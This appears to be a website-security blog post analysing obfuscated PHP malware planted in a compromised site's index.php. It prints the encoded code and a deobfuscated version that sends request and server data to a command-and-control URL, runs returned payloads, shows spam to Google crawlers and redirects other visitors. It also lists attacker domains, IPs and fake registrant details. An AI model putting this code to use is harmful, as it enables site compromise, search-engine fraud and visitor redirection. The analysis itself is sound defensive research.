Navigating 81 Layers of Encoding to Reveal the C&C

This past week we have been sharing a series of articles that highlight steps a hacker has taken to commandeer one of our honeypot domains. We have shared steps taken to take control, the payloads deployed, and the configurations leveraged to take control of the sites SEO.

As interesting as all that has been, today we want to spend some time diving deeper into the malware tailored to help with the last post - Hijacking SERPs. In that specific attack, it was payload found in the index.php file that helped us really understand how the SERP hijacking worked. This article will shine a light into how we look at the world, and share the goodies we found at the end of the rainbow.

Here is what we were working with:

NOC - Hack SEO Spam Payload Found in Index File

**Updated: 2022-08-24: Include a more direct list of all articles related to this research:

81 Layers of Obfuscation - My Goodness

This piece of malware was integral to their SERP hijacking attack. It was the brains of the operation. It would tell which request would get teh SEO Spa, and which would be get malware. But how? Let's dive in.

The code starts by creating a variable '$fdguvldfj' and assigning a random stream of characters:


$fdguvldfj='.t=)*+iavyd&;?nq:rlz|[wfe\"(j/ous cg^bhxp-$_k<]#>mBUL0FDZ34S2WNICK6XAV5Y1EPHJTO8R7M9QG';

At least it seems random at first glance.

But in fact, it was creating multiple variables with random names ('$lcebqactn', '$nvvuufsqd', '$rppirnguc', etc) built from pieces from that first 'random' variable $fdguvldfj that was just assigned before.

This is what it was doing:


$lcebqactn=$fdguvldfj[34].$fdguvldfj[31].$fdguvldfj[17].$fdguvldfj[18].$fdguvldfj[43].$fdguvldfj[6].$fdguvldfj[14].$fdguvldfj[6].$fdguvldfj[1];
$nvvuufsqd=$fdguvldfj[34].$fdguvldfj[31].$fdguvldfj[17].$fdguvldfj[18].$fdguvldfj[43].$fdguvldfj[32].$fdguvldfj[24].$fdguvldfj[1].$fdguvldfj[30].$fdguvldfj[40].$fdguvldfj[1];
$rppirnguc=$fdguvldfj[34].$fdguvldfj[31].$fdguvldfj[17].$fdguvldfj[18].$fdguvldfj[43].$fdguvldfj[24].$fdguvldfj[39].$fdguvldfj[24].$fdguvldfj[34];
$fiqpmzbcd=$fdguvldfj[23].$fdguvldfj[31].$fdguvldfj[14].$fdguvldfj[34].$fdguvldfj[1].$fdguvldfj[6].$fdguvldfj[30].$fdguvldfj[14].$fdguvldfj[43].$fdguvldfj[24].$fdguvldfj[39].$fdguvldfj[6].$fdguvldfj[32].$fdguvldfj[1].$fdguvldfj[32];
$mmgnyeoit=$fdguvldfj[34].$fdguvldfj[31].$fdguvldfj[17].$fdguvldfj[18].$fdguvldfj[43].$fdguvldfj[34].$fdguvldfj[18].$fdguvldfj[30].$fdguvldfj[32].$fdguvldfj[24];
$vwfmprrqe=$fdguvldfj[10].$fdguvldfj[7].$fdguvldfj[1].$fdguvldfj[24].$fdguvldfj[41].$fdguvldfj[34].$fdguvldfj[24].$fdguvldfj[14].$fdguvldfj[1].$fdguvldfj[24].$fdguvldfj[17].$fdguvldfj[0].$fdguvldfj[34].$fdguvldfj[30].$fdguvldfj[49];
$hvdtcdmcb=$fdguvldfj[28].$fdguvldfj[24].$fdguvldfj[7].$fdguvldfj[14].$fdguvldfj[17].$fdguvldfj[30].$fdguvldfj[18];
$aajplftqv=$fdguvldfj[14].$fdguvldfj[7].$fdguvldfj[32].$fdguvldfj[31].$fdguvldfj[10].$fdguvldfj[6].$fdguvldfj[30].$fdguvldfj[7];

Clear as mud, right?

The easiest way to make sense of this is to print each variable, and we can do that using something as simple as echo:


echo "$lcebqactn\n";

echo "$nvvuufsqd\n";

echo "$rppirnguc\n";

echo "$fiqpmzbcd\n";

echo "$mmgnyeoit\n";

echo "$vwfmprrqe\n";

echo "$hvdtcdmcb\n";

echo "$aajplftqv\n";

echo "$crbxfqdut\n";

exit(0);

Ah! Look at that, here is what they were hiding:


curl_init

curl_setopt

curl_exec

function_exists

curl_close

date-center.com

jeanrol

nasudioa

http://www.

http://

count

http_build_query

stream_context_create

file_get_contents

SqUrl

requestArr

HTTP_X_FORWARDED_FOR

HTTP_CLIENT_IP

HTTP_X_FORWARDED

HTTP_X_CLUSTER_CLIENT_IP

HTTP_FORWARDED_FOR

HTTP_FORWARDED

REMOTE_ADDR

getenv

strcasecmp

unknown

MyCIp

com/eu/9467

.txt

api.php

product_info&products_id=

index&cPath=

Googlebot

Mediapartners-Google

Adsbot-Google

Google AdSense

<script>window.location = "

index.php?main_page=

";</script>

HTTP_REFERER

REQUEST_URI

strpos

strtolower

strstr

base64_decode

gzinflate

json_encode

HTTP_USER_AGENT

customer_ips

trim

delete-tag

delete-link

#<code>(.+)</code>#si

</code>

preg_match

#google#i

gethostbyaddr

set_time_limit

ini_set

display_errors

#^https?://www.[^/]+/$#i

#google\.(co\.uk|ie)#i

#[a-z]+-(\d+)-.+#i

#.+-(\d+)#i

_SERVER

_GET

rdviservice.com

/ebayuk220726-38/

Content-Type: application/x-www-form-urlencoded

header

content

timeout

method

http

POST

id

cat

zmvrqibpe

mpyytjbwq

cunnywbmb

qeynpfqgd

So if you're like us, now getting a bit excited.

In total it creates 81 random-looking variables and assigns them specific values to be used later in the code. Who does this? My goodness...

While annoying for us, it is a highly effective technique to help prevent creating patterns that can be used by security tools to detect the malware on disk (or in transfer). But now we have to put it all together.

Reverse Engineering the Malware Payload

Make note, we're not talking basic base65 encoding. After assigning the variables , the malware code really starts with the execution part. It is all hex+oct encoded:


${"\X47\114\117\102\101\X4C\X53"}["\X66\X62\X77\X65\X7A\X66\X65\X68\X74"](0);${"\X47\114\117\102\101\X4C\X53"}["\X6E\X79\X63\X63\X71\X73\X74\X68\X6F"](${"\X47\114\117\102\101\X4C\X53"}["\X6A\X6F\X78\X6A\X74\X76\X79\X75\X73"], 0);...

The process was so convoluted we had to build a few tools to help us break it down, but we made progress slowly and it started to get a big clearer:


${"GLOBALS"}["fbwezfeht"](0);

${"GLOBALS"}["nyccqstho"](${"GLOBALS"}["joxjtvyus"], 0);

${"_SERVER"};${"GLOBALS"}["rajdanouv"] = ${"GLOBALS"}["nispvlkox"]();

While helpful, it had a ways to go. It was still calling the random variables it created, so we needed to replace them to get the real functions being called.


${"GLOBALS"}["eblpxpako"]();function qeynpfqgd(){${"vycrenftw"} = array(${"GLOBALS"}["lcebqactn"],${"GLOBALS"}["nvvuufsqd"],${"GLOBALS"}["rppirnguc"]);${"jvryfblhu"} = true;..

Ok, this is better, not as clear as we'd like, but it's progress. So we replaced the random variable names for the real names to get and cleaned up the code to make it more readable:


<?php

$set_time_limit(0);

$ini_set($display_errors, 0);

${"_SERVER"};

$MyCIp = $zmvrqibpe();

$cunnywbmb();

function qeynpfqgd()

{

    ${"vycrenftw"} = array($curl_init,$curl_setopt,$curl_exec);

    ${"jvryfblhu"} = true;

..

NOC - SERP Hijacig - Malware Payload to C&C

Why hello there little friend.. now we can make sense of things.

First, it gets the Client IP address (MYCIP):


$MyCIp = $zmvrqibpe();

function zmvrqibpe()
{

    if ($getenv ( $HTTP_CLIENT_IP ) && $strcasecmp ( $getenv ( $HTTP_CLIENT_IP ), $unknown ))

        ${"vycrenftw"} = $getenv ( $HTTP_CLIENT_IP );

    else if ($getenv ( $HTTP_X_FORWARDED_FOR ) && $strcasecmp ( $getenv ( $HTTP_X_FORWARDED_FOR ), $unknown ))

        ${"vycrenftw"} = $getenv ( $HTTP_X_FORWARDED_FOR );

    else if ($getenv ( $REMOTE_ADDR ) && $strcasecmp ( $getenv ( $REMOTE_ADDR ), $unknown ))

        ${"vycrenftw"} = $getenv ( $REMOTE_ADDR );

    else if (isset ( ${"GLOBALS"}[$_SERVER] [$REMOTE_ADDR] ) && ${"GLOBALS"}[$_SERVER] [$REMOTE_ADDR] && $strcasecmp ( ${"GLOBALS"}[$_SERVER] [$REMOTE_ADDR], $unknown ))

        ${"vycrenftw"} = ${"GLOBALS"}[$_SERVER] [$REMOTE_ADDR];

    else ${"vycrenftw"} = '';

    return ${"vycrenftw"};

}

This is used to look for the HTTP_X_FORWARDED_FOR variables, the HTTP_CLIENT_IP and if none are set, it just uses the default REMOTE_ADDR.

Next, it calls the function:


$cunnywbmb();





function cunnywbmb()

{

    $requestArr = array();

    $requestArr["delete-tag"] = $json_encode(${"GLOBALS"}[$_GET]);

    $requestArr["delete-link"] = $json_encode(${"GLOBALS"}[$_SERVER]);

    $SqUrl = "http://" . "rdviservice.com" . "/ebayuk220726-38/" . "api.php";

    $requestArr["customer_ips"] = $MyCIp;

    ${"vycrenftw"} = $qeynpfqgd();

    if($strstr(${"vycrenftw"}, "</code>"))

    {

        ${"jvryfblhu"} = $illzmbxxh;

        if($preg_match(${"jvryfblhu"},${"vycrenftw"},${"fpumqjlna"}))

        {

            ${"ighdabdss"} = ${"fpumqjlna"}[1];

            ${"gwggnfoei"} = $base64_decode($gzinflate(${"ighdabdss"}));

            if(${"gwggnfoei"})

            {

                echo ${"gwggnfoei"};

                exit;

            }

        }

    }

    else

    {

        $mpyytjbwq();

    }

}

Do you see it?

This is used to create a url pointing to http://rdviservice[.]com/ebayuk220726-38/api.php. It also calls the function qeynpfqgd(), which tries to curl to this URL which returns a list of spam domains. The API is a bit unreliable and some times it returns errors like this one:


<b>Fatal error</b>:  Call to undefined function gCss() in <b>/home/html/novexosoure[.]xyz/public_html/ebayuk220726-38/function.php</b> on line <b>2013</b><br />

This error is helpful in exposing their internal path structure (i.e., /home/html/novexosoure[.]xyz/public_html/ebayuk220726-38/).

If there is no <code></code> returned to be executed on the compromised server, it calls this function:


function mpyytjbwq()

This is where it decides what to do with the requests:

If the request comes with any of the following user agents: "Googlebot","Mediapartners-Googl","Adsbot-Google","Google AdSense"

And the remote IP matches one of Google's IPs, it considers the request as coming from Google. In these cases, it displays the spam "properly" to inundate the SERP of that domain.

If the request is not from Google and has a REFERER (redirected from somewhere else), it includes the javascript redirect:


 echo "&lt;script>window.location = ". ${"gwggnfoei"} . "index.php?main_page=";

            echo ${"vlkzmtmns"};

            echo ${"vycrenftw"} . ";&lt;/script>";

This redirects the visitor to one of their ad/malware landing pages.

At the time of our research it was going to:


http://www.jeanrol[.]com/eu/9467.txt -> https://www.ndanialco[.]com/
http://www.nasudioa[.]com/eu/9467.txt

We assume those are randomly created and not always the same.

And that is how it works.

**Updated: 2022-08-25***

Denis, with UnmaskParasites, did a bit more digging and was able to enumerate 170 different shop domains via this redirect. (see complete list).

Gathering Intelligence on the C&C

Because of the nature of the web, it's not always easy to ascertain who the bad actors are. This instance is no different, but there are small bits of information that come to light that can be extremely helpful to shutting them down.

For example, by looking at the key domains from the analysis above this is what we find:

Domain	Hosted	IP	Registrar	Creation Date
rdviservice[.]com	Linode	198.58.127.251	netim.com	2021-04-08T00:00:00Z
jeanrol[.]com	Linode	96.126.125.20	netim.com	2021-03-20T00:00:00Z
ndanialco[.]com	CloudFlare	N/A	namesilo.com	2022-04-27T07:00:00Z
novexosoure[.]xyz	Linode	198.58.127.251	publicdomainregistry.com	2018-10-26T03:29:11Z
psotudev[.]com	Linode	96.126.125.20	namesilo.com	2020-12-27T07:00:00Z
transferdm[.]xyz	Linode	96.126.125.20	namesilo.com	2017-12-01T09:57:28Z

You will notice that we were able to find other domains associated with the hosts via different tools. They only had CloudFlare on one domain, and via the other domains that didn't have a reverse proxy we were able to ascertain to the HOST IP and from there we could find other associated domains on those servers.

From this we can start to get a much better picture of how this operation works. Almost all the domains are hosted on Linode, and we have no doubt the one on CloudFlare is also on Linode. Most of the domains are greeted with the same log in page:

It also seems almost all the domains were created with fake user information (which calls into question the entire registrar verification process). Example:

Registrant	transferdm[.]xyz	psotudev[.]com	novexosource[.]xyz	ndanalco[.]com
Name	Maryann Stone	Angela Walker	Mark Baker	Kayla Lawson
Street	1567 Park Avenue	1922 Lighthouse Drive	2363 Doe Meadow Drive	3294 Havanna Street
City	Sacramento	Branson	Hagerstown	Winston Salem
State	California	Missouri	Maryland	North Carolina
Email	xttsy844703@163.com	akikobatistajayden15321@	iravolkopyalova@	phenomenon29923333@

The best we can do with this information is submit it the Registrar and Host and let them do their magic to disable the domain and server for breach of ToS. In the process making the web just that much safer and hopefully shutting down a spam network.

Posted in security-research wordpress-security by Tony Perez (@perezbox)

NOC.org

Website security is our passion. In this section we will share articles about web attacks and how to secure your sites.

NOC.org Services

NOC offers a number of services.

NOC Free Services

NOC powers a number of free tools:

NOC Help Documentation

These categories organize our help documentation:

Latest Articles

2022-10-13
Registries, Registrars and DNS

2022-10-13
WooCommerce Patches Two SQLi Vulnerabilities

2022-10-13
The Affects of a CDN on your Websites Performance and Users Experience (and Google)

2022-10-13
Responding to Security Incidents – Incident Response Plan Basics and Log4Shell

2022-10-13
Securing WordPress in The Enterprise

2022-10-13
Log4Shell – Lessons Learned in 30 Days

Latest Help Documents

2022-10-17
How To Change Nameservers on NameCheap

2022-10-17
How To Change Nameservers on Hover

2022-10-17
How To Change Nameservers on GoDaddy

2022-10-17
How To Change Nameservers on Network Solutions

2022-09-30
Getting started Website Monitoring

2022-09-30
Getting started w/Authoritative DNS

Contact us!

Do you have an idea for an article that is not here? See something wrong? Contact us at support@noc.org